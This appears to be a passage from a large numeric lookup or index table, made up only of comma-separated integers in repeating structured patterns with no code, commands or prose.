4308, 2836, 1879, 1889, 1898, 1906, 65, 1649,
3354, 3574, 1715, 3399, 6203, 3619, 3794, 3839,
1781, 3435, 6239, 3655, 6359, 6687, 3875, 4014,
4059, 4095, 1847, 3463, 6267, 3683, 6387, 6715,
3903, 6471, 6799, 7008, 4123, 4234, 4279, 4315,
4343, 1913, 2517, 4430, 2638, 4439, 4484, 2748,
4447, 4492, 4528, 2847, 4454, 4499, 4535, 4563,
2935, 1945, 1955, 1964, 1972, 1979, 77, 1655,
3360, 3580, 1721, 3405, 6209, 3625, 3800, 3845,
1787, 3441, 6245, 3661, 6365, 6693, 3881, 4020,
4065, 4101, 1853, 3469, 6273, 3689, 6393, 6721,
3909, 6477, 6805, 7014, 4129, 4240, 4285, 4321,
4349, 1919, 3490, 6294, 3710, 6414, 6742, 3930,
6498, 6826, 7035, 4150, 6554, 6882, 7091, 1603,
4370, 4460, 4505, 4541, 4569, 4590, 1985, 2528,
4650, 2649, 4659, 4704, 2759, 4667, 4712, 4748,
2858, 4674, 4719, 4755, 4783, 2946, 4680, 4725,
4761, 4789, 4810, 3023, 2011, 2021, 2030, 2038,
2045, 2051, 89, 173, 2534, 2655, 185, 2535,
4866, 2656, 2765, 2766, 197, 2536, 4867, 2657,
4876, 4921, 2767, 2864, 2865, 2866, 209, 2537,
4868, 2658, 4877, 4922, 2768, 4885, 4930, 4966,
2867, 2952, 2953, 2954, 2955, 221, 2538, 4869,
2659, 4878, 4923, 2769, 4886, 4931, 4967, 2868,
4893, 4938, 4974, 5002, 2956, 3029, 3030, 3031,
3032, 3033, 233, 2539, 4870, 2660, 4879, 4924,
2770, 4887, 4932, 4968, 2869, 4894, 4939, 4975,
5003, 2957, 4900, 4945, 4981, 5009, 5030, 3034,
3095, 3096, 3097, 3098, 3099, 3100, 245, 251,
2072, 252, 2073, 2083, 253, 2074, 2084, 2093,
254, 2075, 2085, 2094, 2102, 255, 2076, 2086,
2095, 2103, 2110, 256, 2077, 2087, 2096, 2104,
2111, 2117, 257, 95, 96, 97, 98, 99,
100, 101, 18, 1616, 2474, 1682, 30, 1626,
3331, 3551, 1692, 2485, 3771, 2606, 1748, 1758,
42, 1635, 3340, 3560, 1701, 3385, 6189, 3605,
3780, 3825, 1767, 2496, 3991, 2617, 4000, 4045,
2727, 1814, 1824, 1833, 54, 1643, 3348, 3568,
1709, 3393, 6197, 3613, 3788, 3833, 1775, 3429,
6233, 3649, 6353, 6681, 3869, 4008, 4053, 4089,
1841, 2507, 4211, 2628, 4220, 4265, 2738, 4228,
4273, 4309, 2837, 1880, 1890, 1899, 1907, 66,
1650, 3355, 3575, 1716, 3400, 6204, 3620, 3795,
3840, 1782, 3436, 6240, 3656, 6360, 6688, 3876,
4015, 4060, 4096, 1848, 3464, 6268, 3684, 6388,
6716, 3904, 6472, 6800, 7009, 4124, 4235, 4280,
4316, 4344, 1914, 2518, 4431, 2639, 4440, 4485,
2749, 4448, 4493, 4529, 2848, 4455, 4500, 4536,
4564, 2936, 1946, 1956, 1965, 1973, 1980, 78,
1656, 3361, 3581, 1722, 3406, 6210, 3626, 3801,
3846, 1788, 3442, 6246, 3662, 6366, 6694, 3882,
4021, 4066, 4102, 1854, 3470, 6274, 3690, 6394,
6722, 3910, 6478, 6806, 7015, 4130, 4241, 4286,
4322, 4350, 1920, 3491, 6295, 3711, 6415, 6743,
3931, 6499, 6827, 7036, 4151, 6555, 6883, 7092,
7217, 4371, 4461, 4506, 4542, 4570, 4591, 1986,
2529, 4651, 2650, 4660, 4705, 2760, 4668, 4713,
4749, 2859, 4675, 4720, 4756, 4784, 2947, 4681,
4726, 4762, 4790, 4811, 3024, 2012, 2022, 2031,
2039, 2046, 2052, 90, 1661, 3366, 3586, 1727,
3411, 6215, 3631, 3806, 3851, 1793, 3447, 6251,
3667, 6371, 6699, 3887, 4026, 4071, 4107, 1859,
3475, 6279, 3695, 6399, 6727, 3915, 6483, 6811,
7020, 4135, 4246, 4291, 4327, 4355, 1925, 3496,
6300, 3716, 6420, 6748, 3936, 6504, 6832, 7041,
4156, 6560, 6888, 7097, 7222, 4376, 4466, 4511,
4547, 4575, 4596, 1991, 3511, 6315, 3731, 6435,
6763, 3951, 6519, 6847, 7056, 4171, 6575, 6903,
7112, 7237, 4391, 1605, 1605, 1605, 1605, 1604,
1605, 4686, 4731, 4767, 4795, 4816, 1605, 2057,
2540, 4871, 2661, 4880, 4925, 2771, 4888, 4933,
4969, 2870, 4895, 4940, 4976, 5004, 2958, 4901,
4946, 4982, 5010, 5031, 3035, 4906, 4951, 4987,
5015, 5036, 1605, 3101, 2078, 2088, 2097, 2105,
2112, 2118, 2123, 102, 174, 2545, 2666, 186,
2546, 5086, 2667, 2776, 2777, 198, 2547, 5087,
2668, 5096, 5141, 2778, 2875, 2876, 2877, 210,
2548, 5088, 2669, 5097, 5142, 2779, 5105, 5150,
5186, 2878, 2963, 2964, 2965, 2966, 222, 2549,
5089, 2670, 5098, 5143, 2780, 5106, 5151, 5187,
2879, 5113, 5158, 5194, 5222, 2967, 3040, 3041,
3042, 3043, 3044, 234, 2550, 5090, 2671, 5099,
5144, 2781, 5107, 5152, 5188, 2880, 5114, 5159,
5195, 5223, 2968, 5120, 5165, 5201, 5229, 5250,
3045, 3106, 3107, 3108, 3109, 3110, 3111, 246,
2551, 5091, 2672, 5100, 5145, 2782, 5108, 5153,
5189, 2881, 5115, 5160, 5196, 5224, 2969, 5121,
5166, 5202, 5230, 5251, 3046, 5126, 5171, 5207,
5235, 5256, 1605, 3112, 3161, 3162, 3163, 3164,
3165, 3166, 3167, 258, 263, 2138, 264, 2139,
2149, 265, 2140, 2150, 2159, 266, 2141, 2151,
2160, 2168, 267, 2142, 2152, 2161, 2169, 2176,
268, 2143, 2153, 2162, 2170, 2177, 2183, 269,
2144, 2154, 2163, 2171, 2178, 2184, 2189, 270,
107, 108, 109, 110, 111, 112, 113, 114,
19, 175, 2475, 187, 31, 175, 2556, 2677,
187, 2486, 2787, 2607, 199, 199, 43, 175,
2556, 2677, 187, 2557, 5306, 2678, 2787, 2788,
199, 2497, 2886, 2618, 2886, 2887, 2728, 211,
211, 211, 55, 175, 2556, 2677, 187, 2557,
5306, 2678, 2787, 2788, 199, 2558, 5307, 2679,
5316, 5361, 2789, 2886, 2887, 2888, 211, 2508,
2974, 2629, 2974, 2975, 2739, 2974, 2975, 2976,
2838, 223, 223, 223, 223, 67, 175, 2556,
2677, 187, 2557, 5306, 2678, 2787, 2788, 199,
2558, 5307, 2679, 5316, 5361, 2789, 2886, 2887,
2888, 211, 2559, 5308, 2680, 5317, 5362, 2790,
5325, 5370, 5406, 2889, 2974, 2975, 2976, 2977,
223, 2519, 3051, 2640, 3051, 3052, 2750, 3051,
3052, 3053, 2849, 3051, 3052, 3053, 3054, 2937,
235, 235, 235, 235, 235, 79, 175, 2556,
2677, 187, 2557, 5306, 2678, 2787, 2788, 199,
2558, 5307, 2679, 5316, 5361, 2789, 2886, 2887,
2888, 211, 2559, 5308, 2680, 5317, 5362, 2790,
5325, 5370, 5406, 2889, 2974, 2975, 2976, 2977,
223, 2560, 5309, 2681, 5318, 5363, 2791, 5326,
5371, 5407, 2890, 5333, 5378, 5414, 5442, 2978,
3051, 3052, 3053, 3054, 3055, 235, 2530, 3117,
2651, 3117, 3118, 2761, 3117, 3118, 3119, 2860,
3117, 3118, 3119, 3120, 2948, 3117, 3118, 3119,
3120, 3121, 3025, 247, 247, 247, 247, 247,
247, 91, 175, 2556, 2677, 187, 2557, 5306,
2678, 2787, 2788, 199, 2558, 5307, 2679, 5316,
5361, 2789, 2886, 2887, 2888, 211, 2559, 5308,
2680, 5317, 5362, 2790, 5325, 5370, 5406, 2889,
2974, 2975, 2976, 2977, 223, 2560, 5309, 2681,
5318, 5363, 2791, 5326, 5371, 5407, 2890, 5333,
5378, 5414, 5442, 2978, 3051, 3052, 3053, 3054,
3055, 235, 2561, 5310, 2682, 5319, 5364, 2792,
5327, 5372, 5408, 2891, 5334, 5379, 5415, 5443,
2979, 5340, 5385, 5421, 5449, 5470, 3056, 3117,
3118, 3119, 3120, 3121, 3122, 247, 2541, 3172,
2662, 3172, 3173, 2772, 3172, 3173, 3174, 2871,
3172, 3173, 3174, 3175, 2959, 3172, 3173, 3174,
3175, 3176, 3036, 3172, 3173, 3174, 3175, 3176,
3177, 3102, 259, 259, 259, 259, 259, 259,
259, 103, 175, 2556, 2677, 187, 2557, 5306,
2678, 2787, 2788, 199, 2558, 5307, 2679, 5316,
5361, 2789, 2886, 2887, 2888, 211, 2559, 5308,
2680, 5317, 5362, 2790, 5325, 5370, 5406, 2889,
2974, 2975, 2976, 2977, 223, 2560, 5309, 2681,
5318, 5363, 2791, 5326, 5371, 5407, 2890, 5333,
5378, 5414, 5442, 2978, 3051, 3052, 3053, 3054,
3055, 235, 2561, 5310, 2682, 5319, 5364, 2792,
5327, 5372, 5408, 2891, 5334, 5379, 5415, 5443,
2979, 5340, 5385, 5421, 5449, 5470, 3056, 3117,
3118, 3119, 3120, 3121, 3122, 247, 2562, 5311,
2683, 5320, 5365, 2793, 5328, 5373, 5409, 2892,
5335, 5380, 5416, 5444, 2980, 5341, 5386, 5422,
5450, 5471, 3057, 5346, 5391, 5427, 5455, 5476,
1605, 3123, 3172, 3173, 3174, 3175, 3176, 3177,
3178, 259, 2552, 3216, 2673, 3216, 3217, 2783,
3216, 3217, 3218, 2882, 3216, 3217, 3218, 3219,
2970, 3216, 3217, 3218, 3219, 3220, 3047, 3216,
3217, 3218, 3219, 3220, 3221, 3113, 3216, 3217,
3218, 3219, 3220, 3221, 3222, 3168, 271, 271,
271, 271, 271, 271, 271, 271, 115, 175,
275, 276, 187, 275, 2204, 276, 277, 277,
199, 275, 2204, 276, 2205, 2215, 277, 278,
278, 278, 211, 275, 2204, 276, 2205, 2215,
277, 2206, 2216, 2225, 278, 279, 279, 279,
279, 223, 275, 2204, 276, 2205, 2215, 277,
2206, 2216, 2225, 278, 2207, 2217, 2226, 2234,
279, 280, 280, 280, 280, 280, 235, 275,
2204, 276, 2205, 2215, 277, 2206, 2216, 2225,
278, 2207, 2217, 2226, 2234, 279, 2208, 2218,
2227, 2235, 2242, 280, 281, 281, 281, 281,
281, 281, 247, 275, 2204, 276, 2205, 2215,
277, 2206, 2216, 2225, 278, 2207, 2217, 2226,
2234, 279, 2208, 2218, 2227, 2235, 2242, 280,
2209, 2219, 2228, 2236, 2243, 2249, 281, 282,
282, 282, 282, 282, 282, 282, 259, 275,
2204, 276, 2205, 2215, 277, 2206, 2216, 2225,
278, 2207, 2217, 2226, 2234, 279, 2208, 2218,
2227, 2235, 2242, 280, 2209, 2219, 2228, 2236,
2243, 2249, 281, 2210, 2220, 2229, 2237, 2244,
2250, 2255, 282, 283, 283, 283, 283, 283,
283, 283, 283, 271, 119, 119, 120, 119,
120, 121, 119, 120, 121, 122, 119, 120,
121, 122, 123, 119, 120, 121, 122, 123,
124, 119, 120, 121, 122, 123, 124, 125,
119, 120, 121, 122, 123, 124, 125, 126,
119, 120, 121, 122, 123, 124, 125, 126,
127, 11, 167, 179, 23, 12, 1610, 2468,
1676, 24, 168, 2479, 2600, 180, 191, 1742,
192, 35, 36, 13, 1611, 2469, 1677, 25,
1621, 3326, 3546, 1687, 2480, 3766, 2601, 1743,
1753, 37, 169, 2490, 2611, 181, 2491, 3986,
2612, 2721, 2722, 193, 203, 1808, 204, 1809,
1819, 205, 47, 48, 49, 14, 1612, 2470,
1678, 26, 1622, 3327, 3547, 1688, 2481, 3767,
2602, 1744, 1754, 38, 1631, 3336, 3556, 1697,
3381, 1600, 3601, 3776, 3821, 1763, 2492, 3987,
2613, 3996, 4041, 2723, 1810, 1820, 1829, 50,
170, 2501, 2622, 182, 2502, 4206, 2623, 2732,
2733, 194, 2503, 4207, 2624, 4216, 4261, 2734,
2831, 2832, 2833, 206, 215, 1874, 216, 1875,
1885, 217, 1876, 1886, 1895, 218, 59, 60,
61, 62, 15, 1613, 2471, 1679, 27, 1623,
3328, 3548, 1689, 2482, 3768, 2603, 1745, 1755,
39, 1632, 3337, 3557, 1698, 3382, 6186, 3602,
3777, 3822, 1764, 2493, 3988, 2614, 3997, 4042,
2724, 1811, 1821, 1830, 51, 1640, 3345, 3565,
1706, 3390, 6194, 3610, 3785, 3830, 1772, 3426,
6230, 3646, 6350, 1601, 3866, 4005, 4050, 4086,
1838, 2504, 4208, 2625, 4217, 4262, 2735, 4225,
4270, 4306, 2834, 1877, 1887, 1896, 1904, 63,
171, 2512, 2633, 183, 2513, 4426, 2634, 2743,
2744, 195, 2514, 4427, 2635, 4436, 4481, 2745,
2842, 2843, 2844, 207, 2515, 4428, 2636, 4437,
4482, 2746, 4445, 4490, 4526, 2845, 2930, 2931,
2932, 2933, 219, 227, 1940, 228, 1941, 1951,
229, 1942, 1952, 1961, 230, 1943, 1953, 1962,
1970, 231, 71, 72, 73, 74, 75, 16,
1614, 2472, 1680, 28, 1624, 3329, 3549, 1690,
2483, 3769, 2604, 1746, 1756, 40, 1633, 3338,
3558, 1699, 3383, 6187, 3603, 3778, 3823, 1765,
2494, 3989, 2615, 3998, 4043, 2725, 1812, 1822,
1831, 52, 1641, 3346, 3566, 1707, 3391, 6195,
3611, 3786, 3831, 1773, 3427, 6231, 3647, 6351,
6679, 3867, 4006, 4051, 4087, 1839, 2505, 4209,
2626, 4218, 4263, 2736, 4226, 4271, 4307, 2835,
1878, 1888, 1897, 1905, 64, 1648, 3353, 3573,
1714, 3398, 6202, 3618, 3793, 3838, 1780, 3434,
6238, 3654, 6358, 6686, 3874, 4013, 4058, 4094,
1846, 3462, 6266, 3682, 6386, 6714, 3902, 6470,
6798, 1602, 4122, 4233, 4278, 4314, 4342, 1912,
2516, 4429, 2637, 4438, 4483, 2747, 4446, 4491,
4527, 2846, 4453, 4498, 4534, 4562, 2934, 1944,
1954, 1963, 1971, 1978, 76, 172, 2523, 2644,
184, 2524, 4646, 2645, 2754, 2755, 196, 2525,
4647, 2646, 4656, 4701, 2756, 2853, 2854, 2855,
208, 2526, 4648, 2647, 4657, 4702, 2757, 4665,
4710, 4746, 2856, 2941, 2942, 2943, 2944, 220,
2527, 4649, 2648, 4658, 4703, 2758, 4666, 4711,
4747, 2857, 4673, 4718, 4754, 4782, 2945, 3018,
3019, 3020, 3021, 3022, 232, 239, 2006, 240,
2007, 2017, 241, 2008, 2018, 2027, 242, 2009,
2019, 2028, 2036, 243, 2010, 2020, 2029, 2037,
2044, 244, 83, 84, 85, 86, 87, 88,
17, 1615, 2473, 1681, 29, 1625, 3330, 3550,
1691, 2484, 3770, 2605, 1747, 1757, 41, 1634,
3339, 3559, 1700, 3384, 6188, 3604, 3779, 3824,
1766, 2495, 3990, 2616, 3999, 4044, 2726, 1813,
1823, 1832, 53, 1642, 3347, 3567, 1708, 3392,
6196, 3612, 3787, 3832, 1774, 3428, 6232, 3648,
6352, 6680, 3868, 4007, 4052, 4088, 1840, 2506,
4210, 2627, 4219, 4264, 2737, 4227, 4272, 4308,
2836, 1879, 1889, 1898, 1906, 65, 1649, 3354,
3574, 1715, 3399, 6203, 3619, 3794, 3839, 1781,
3435, 6239, 3655, 6359, 6687, 3875, 4014, 4059,
4095, 1847, 3463, 6267, 3683, 6387, 6715, 3903,
6471, 6799, 7008, 4123, 4234, 4279, 4315, 4343,
1913, 2517, 4430, 2638, 4439, 4484, 2748, 4447,
4492, 4528, 2847, 4454, 4499, 4535, 4563, 2935,
1945, 1955, 1964, 1972, 1979, 77, 1655, 3360,
3580, 1721, 3405, 6209, 3625, 3800, 3845, 1787,
3441, 6245, 3661, 6365, 6693, 3881, 4020, 4065,
4101, 1853, 3469, 6273, 3689, 6393, 6721, 3909,
6477, 6805, 7014, 4129, 4240, 4285, 4321, 4349,
1919, 3490, 6294, 3710, 6414, 6742, 3930, 6498,
6826, 7035, 4150, 6554, 6882, 7091, 1603, 4370,
4460, 4505, 4541, 4569, 4590, 1985, 2528, 4650,
2649, 4659, 4704, 2759, 4667, 4712, 4748, 2858,
4674, 4719, 4755, 4783, 2946, 4680, 4725, 4761,
4789, 4810, 3023, 2011, 2021, 2030, 2038, 2045,
2051, 89, 173, 2534, 2655, 185, 2535, 4866,
2656, 2765, 2766, 197, 2536, 4867, 2657, 4876,
4921, 2767, 2864, 2865, 2866, 209, 2537, 4868,
2658, 4877, 4922, 2768, 4885, 4930, 4966, 2867,
2952, 2953, 2954, 2955, 221, 2538, 4869, 2659,
4878, 4923, 2769, 4886, 4931, 4967, 2868, 4893,
4938, 4974, 5002, 2956, 3029, 3030, 3031, 3032,
3033, 233, 2539, 4870, 2660, 4879, 4924, 2770,
4887, 4932, 4968, 2869, 4894, 4939, 4975, 5003,
2957, 4900, 4945, 4981, 5009, 5030, 3034, 3095,
3096, 3097, 3098, 3099, 3100, 245, 251, 2072,
252, 2073, 2083, 253, 2074, 2084, 2093, 254,
2075, 2085, 2094, 2102, 255, 2076, 2086, 2095,
2103, 2110, 256, 2077, 2087, 2096, 2104, 2111,
2117, 257, 95, 96, 97, 98, 99, 100,
101, 18, 1616, 2474, 1682, 30, 1626, 3331,
3551, 1692, 2485, 3771, 2606, 1748, 1758, 42,
1635, 3340, 3560, 1701, 3385, 6189, 3605, 3780,
3825, 1767, 2496, 3991, 2617, 4000, 4045, 2727,
1814, 1824, 1833, 54, 1643, 3348, 3568, 1709,
3393, 6197, 3613, 3788, 3833, 1775, 3429, 6233,
3649, 6353, 6681, 3869, 4008, 4053, 4089, 1841,
2507, 4211, 2628, 4220, 4265, 2738, 4228, 4273,
4309, 2837, 1880, 1890, 1899, 1907, 66, 1650,
3355, 3575, 1716, 3400, 6204, 3620, 3795, 3840,
1782, 3436, 6240, 3656, 6360, 6688, 3876, 4015,
4060, 4096, 1848, 3464, 6268, 3684, 6388, 6716,
3904, 6472, 6800, 7009, 4124, 4235, 4280, 4316,
4344, 1914, 2518, 4431, 2639, 4440, 4485, 2749,
4448, 4493, 4529, 2848, 4455, 4500, 4536, 4564,
2936, 1946, 1956, 1965, 1973, 1980, 78, 1656,
3361, 3581, 1722, 3406, 6210, 3626, 3801, 3846,
1788, 3442, 6246, 3662, 6366, 6694, 3882, 4021,
4066, 4102, 1854, 3470, 6274, 3690, 6394, 6722,
3910, 6478, 6806, 7015, 4130, 4241, 4286, 4322,
4350, 1920, 3491, 6295, 3711, 6415, 6743, 3931,
6499, 6827, 7036, 4151, 6555, 6883, 7092, 7217,
4371, 4461, 4506, 4542, 4570, 4591, 1986, 2529,
4651, 2650, 4660, 4705, 2760, 4668, 4713, 4749,
2859, 4675, 4720, 4756, 4784, 2947, 4681, 4726,
4762, 4790, 4811, 3024, 2012, 2022, 2031, 2039,
2046, 2052, 90, 1661, 3366, 3586, 1727, 3411,
6215, 3631, 3806, 3851, 1793, 3447, 6251, 3667,
6371, 6699, 3887, 4026, 4071, 4107, 1859, 3475,
6279, 3695, 6399, 6727, 3915, 6483, 6811, 7020,
4135, 4246, 4291, 4327, 4355, 1925, 3496, 6300,
3716, 6420, 6748, 3936, 6504, 6832, 7041, 4156,
6560, 6888, 7097, 7222, 4376, 4466, 4511, 4547,
4575, 4596, 1991, 3511, 6315, 3731, 6435, 6763,
3951, 6519, 6847, 7056, 4171, 6575, 6903, 7112,
7237, 4391, 6610, 6938, 7147, 7272, 1604, 4611,
4686, 4731, 4767, 4795, 4816, 4831, 2057, 2540,
4871, 2661, 4880, 4925, 2771, 4888, 4933, 4969,
2870, 4895, 4940, 4976, 5004, 2958, 4901, 4946,
4982, 5010, 5031, 3035, 4906, 4951, 4987, 5015,
5036, 5051, 3101, 2078, 2088, 2097, 2105, 2112,
2118, 2123, 102, 174, 2545, 2666, 186, 2546,
5086, 2667, 2776, 2777, 198, 2547, 5087, 2668,
5096, 5141, 2778, 2875, 2876, 2877, 210, 2548,
5088, 2669, 5097, 5142, 2779, 5105, 5150, 5186,
2878, 2963, 2964, 2965, 2966, 222, 2549, 5089,
2670, 5098, 5143, 2780, 5106, 5151, 5187, 2879,
5113, 5158, 5194, 5222, 2967, 3040, 3041, 3042,
3043, 3044, 234, 2550, 5090, 2671, 5099, 5144,
2781, 5107, 5152, 5188, 2880, 5114, 5159, 5195,
5223, 2968, 5120, 5165, 5201, 5229, 5250, 3045,
3106, 3107, 3108, 3109, 3110, 3111, 246, 2551,
5091, 2672, 5100, 5145, 2782, 5108, 5153, 5189,
2881, 5115, 5160, 5196, 5224, 2969, 5121, 5166,
5202, 5230, 5251, 3046, 5126, 5171, 5207, 5235,
5256, 5271, 3112, 3161, 3162, 3163, 3164, 3165,
3166, 3167, 258, 263, 2138, 264, 2139, 2149,
265, 2140, 2150, 2159, 266, 2141, 2151, 2160,
2168, 267, 2142, 2152, 2161, 2169, 2176, 268,
2143, 2153, 2162, 2170, 2177, 2183, 269, 2144,
2154, 2163, 2171, 2178, 2184, 2189, 270, 107,
108, 109, 110, 111, 112, 113, 114, 19,
1617, 2475, 1683, 31, 1627, 3332, 3552, 1693,
2486, 3772, 2607, 1749, 1759, 43, 1636, 3341,
3561, 1702, 3386, 6190, 3606, 3781, 3826, 1768,
2497, 3992, 2618, 4001, 4046, 2728, 1815, 1825,
1834, 55, 1644, 3349, 3569, 1710, 3394, 6198,
3614, 3789, 3834, 1776, 3430, 6234, 3650, 6354,
6682, 3870, 4009, 4054, 4090, 1842, 2508, 4212,
2629, 4221, 4266, 2739, 4229, 4274, 4310, 2838,
1881, 1891, 1900, 1908, 67, 1651, 3356, 3576,
1717, 3401, 6205, 3621, 3796, 3841, 1783, 3437,
6241, 3657, 6361, 6689, 3877, 4016, 4061, 4097,
1849, 3465, 6269, 3685, 6389, 6717, 3905, 6473,
6801, 7010, 4125, 4236, 4281, 4317, 4345, 1915,
2519, 4432, 2640, 4441, 4486, 2750, 4449, 4494,
4530, 2849, 4456, 4501, 4537, 4565, 2937, 1947,
1957, 1966, 1974, 1981, 79, 1657, 3362, 3582,
1723, 3407, 6211, 3627, 3802, 3847, 1789, 3443,
6247, 3663, 6367, 6695, 3883, 4022, 4067, 4103,
1855, 3471, 6275, 3691, 6395, 6723, 3911, 6479,
6807, 7016, 4131, 4242, 4287, 4323, 4351, 1921,
3492, 6296, 3712, 6416, 6744, 3932, 6500, 6828,
7037, 4152, 6556, 6884, 7093, 7218, 4372, 4462,
4507, 4543, 4571, 4592, 1987, 2530, 4652, 2651,
4661, 4706, 2761, 4669, 4714, 4750, 2860, 4676,
4721, 4757, 4785, 2948, 4682, 4727, 4763, 4791,
4812, 3025, 2013, 2023, 2032, 2040, 2047, 2053,
91, 1662, 3367, 3587, 1728, 3412, 6216, 3632,
3807, 3852, 1794, 3448, 6252, 3668, 6372, 6700,
3888, 4027, 4072, 4108, 1860, 3476, 6280, 3696,
6400, 6728, 3916, 6484, 6812, 7021, 4136, 4247,
4292, 4328, 4356, 1926, 3497, 6301, 3717, 6421,
6749, 3937, 6505, 6833, 7042, 4157, 6561, 6889,
7098, 7223, 4377, 4467, 4512, 4548, 4576, 4597,
1992, 3512, 6316, 3732, 6436, 6764, 3952, 6520,
6848, 7057, 4172, 6576, 6904, 7113, 7238, 4392,
6611, 6939, 7148, 7273, 7342, 4612, 4687, 4732,
4768, 4796, 4817, 4832, 2058, 2541, 4872, 2662,
4881, 4926, 2772, 4889, 4934, 4970, 2871, 4896,
4941, 4977, 5005, 2959, 4902, 4947, 4983, 5011,
5032, 3036, 4907, 4952, 4988, 5016, 5037, 5052,
3102, 2079, 2089, 2098, 2106, 2113, 2119, 2124,
103, 1666, 3371, 3591, 1732, 3416, 6220, 3636,
3811, 3856, 1798, 3452, 6256, 3672, 6376, 6704,
3892, 4031, 4076, 4112, 1864, 3480, 6284, 3700,
6404, 6732, 3920, 6488, 6816, 7025, 4140, 4251,
4296, 4332, 4360, 1930, 3501, 6305, 3721, 6425,
6753, 3941, 6509, 6837, 7046, 4161, 6565, 6893,
7102, 7227, 4381, 4471, 4516, 4552, 4580, 4601,
1996, 3516, 6320, 3736, 6440, 6768, 3956, 6524,
6852, 7061, 4176, 6580, 6908, 7117, 7242, 4396,
6615, 6943, 7152, 7277, 7346, 4616, 4691, 4736,
4772, 4800, 4821, 4836, 2062, 3526, 6330, 3746,
6450, 6778, 3966, 6534, 6862, 7071, 4186, 6590,
6918, 7127, 7252, 4406, 6625, 6953, 7162, 7287,
7356, 4626, 1606, 1606, 1606, 1606, 1606, 1605,
1606, 4911, 4956, 4992, 5020, 5041, 5056, 1606,
2128, 2552, 5092, 2673, 5101, 5146, 2783, 5109,
5154, 5190, 2882, 5116, 5161, 5197, 5225, 2970,
5122, 5167, 5203, 5231, 5252, 3047, 5127, 5172,
5208, 5236, 5257, 5272, 3113, 5131, 5176, 5212,
5240, 5261, 5276, 1606, 3168, 2145, 2155, 2164,
2172, 2179, 2185, 2190, 2194, 115, 175, 2556,
2677, 187, 2557, 5306, 2678, 2787, 2788, 199,
2558, 5307, 2679, 5316, 5361, 2789, 2886, 2887,
2888, 211, 2559, 5308, 2680, 5317, 5362, 2790,
5325, 5370, 5406, 2889, 2974, 2975, 2976, 2977,
223, 2560, 5309, 2681, 5318, 5363, 2791, 5326,
5371, 5407, 2890, 5333, 5378, 5414, 5442, 2978,
3051, 3052, 3053, 3054, 3055, 235, 2561, 5310,
2682, 5319, 5364, 2792, 5327, 5372, 5408, 2891,
5334, 5379, 5415, 5443, 2979, 5340, 5385, 5421,
5449, 5470, 3056, 3117, 3118, 3119, 3120, 3121,
3122, 247, 2562, 5311, 2683, 5320, 5365, 2793,
5328, 5373, 5409, 2892, 5335, 5380, 5416, 5444,
2980, 5341, 5386, 5422, 5450, 5471, 3057, 5346,
5391, 5427, 5455, 5476, 5491, 3123, 3172, 3173,
3174, 3175, 3176, 3177, 3178, 259, 2563, 5312,
2684, 5321, 5366, 2794, 5329, 5374, 5410, 2893,
5336, 5381, 5417, 5445, 2981, 5342, 5387, 5423,
5451, 5472, 3058, 5347, 5392, 5428, 5456, 5477,
5492, 3124, 5351, 5396, 5432, 5460, 5481, 5496,
1606, 3179, 3216, 3217, 3218, 3219, 3220, 3221,
3222, 3223, 271, 275, 2204, 276, 2205, 2215,
277, 2206, 2216, 2225, 278, 2207, 2217, 2226,
2234, 279, 2208, 2218, 2227, 2235, 2242, 280,
2209, 2219, 2228, 2236, 2243, 2249, 281, 2210,
2220, 2229, 2237, 2244, 2250, 2255, 282, 2211,
2221, 2230, 2238, 2245, 2251, 2256, 2260, 283,
119, 120, 121, 122, 123, 124, 125, 126,
127, 20, 176, 2476, 188, 32, 176, 2567,
2688, 188, 2487, 2798, 2608, 200, 200, 44,
176, 2567, 2688, 188, 2568, 5526, 2689, 2798,
2799, 200, 2498, 2897, 2619, 2897, 2898, 2729,
212, 212, 212, 56, 176, 2567, 2688, 188,
2568, 5526, 2689, 2798, 2799, 200, 2569, 5527,
2690, 5536, 5581, 2800, 2897, 2898, 2899, 212,
2509, 2985, 2630, 2985, 2986, 2740, 2985, 2986,
2987, 2839, 224, 224, 224, 224, 68, 176,
2567, 2688, 188, 2568, 5526, 2689, 2798, 2799,
200, 2569, 5527, 2690, 5536, 5581, 2800, 2897,
2898, 2899, 212, 2570, 5528, 2691, 5537, 5582,
2801, 5545, 5590, 5626, 2900, 2985, 2986, 2987,
2988, 224, 2520, 3062, 2641, 3062, 3063, 2751,
3062, 3063, 3064, 2850, 3062, 3063, 3064, 3065,
2938, 236, 236, 236, 236, 236, 80, 176,
2567, 2688, 188, 2568, 5526, 2689, 2798, 2799,
200, 2569, 5527, 2690, 5536, 5581, 2800, 2897,
2898, 2899, 212, 2570, 5528, 2691, 5537, 5582,
2801, 5545, 5590, 5626, 2900, 2985, 2986, 2987,
2988, 224, 2571, 5529, 2692, 5538, 5583, 2802,
5546, 5591, 5627, 2901, 5553, 5598, 5634, 5662,
2989, 3062, 3063, 3064, 3065, 3066, 236, 2531,
3128, 2652, 3128, 3129, 2762, 3128, 3129, 3130,
2861, 3128, 3129, 3130, 3131, 2949, 3128, 3129,
3130, 3131, 3132, 3026, 248, 248, 248, 248,
248, 248, 92, 176, 2567, 2688, 188, 2568,
5526, 2689, 2798, 2799, 200, 2569, 5527, 2690,
5536, 5581, 2800, 2897, 2898, 2899, 212, 2570,
5528, 2691, 5537, 5582, 2801, 5545, 5590, 5626,
2900, 2985, 2986, 2987, 2988, 224, 2571, 5529,
2692, 5538, 5583, 2802, 5546, 5591, 5627, 2901,
5553, 5598, 5634, 5662, 2989, 3062, 3063, 3064,
3065, 3066, 236, 2572, 5530, 2693, 5539, 5584,
2803, 5547, 5592, 5628, 2902, 5554, 5599, 5635,
5663, 2990, 5560, 5605, 5641, 5669, 5690, 3067,
3128, 3129, 3130, 3131, 3132, 3133, 248, 2542,
3183, 2663, 3183, 3184, 2773, 3183, 3184, 3185,
2872, 3183, 3184, 3185, 3186, 2960, 3183, 3184,
3185, 3186, 3187, 3037, 3183, 3184, 3185, 3186,
3187, 3188, 3103, 260, 260, 260, 260, 260,
260, 260, 104, 176, 2567, 2688, 188, 2568,
5526, 2689, 2798, 2799, 200, 2569, 5527, 2690,
5536, 5581, 2800, 2897, 2898, 2899, 212, 2570,
5528, 2691, 5537, 5582, 2801, 5545, 5590, 5626,
2900, 2985, 2986, 2987, 2988, 224, 2571, 5529,
2692, 5538, 5583, 2802, 5546, 5591, 5627, 2901,
5553, 5598, 5634, 5662, 2989, 3062, 3063, 3064,
3065, 3066, 236, 2572, 5530, 2693, 5539, 5584,
2803, 5547, 5592, 5628, 2902, 5554, 5599, 5635,
5663, 2990, 5560, 5605, 5641, 5669, 5690, 3067,
3128, 3129, 3130, 3131, 3132, 3133, 248, 2573,
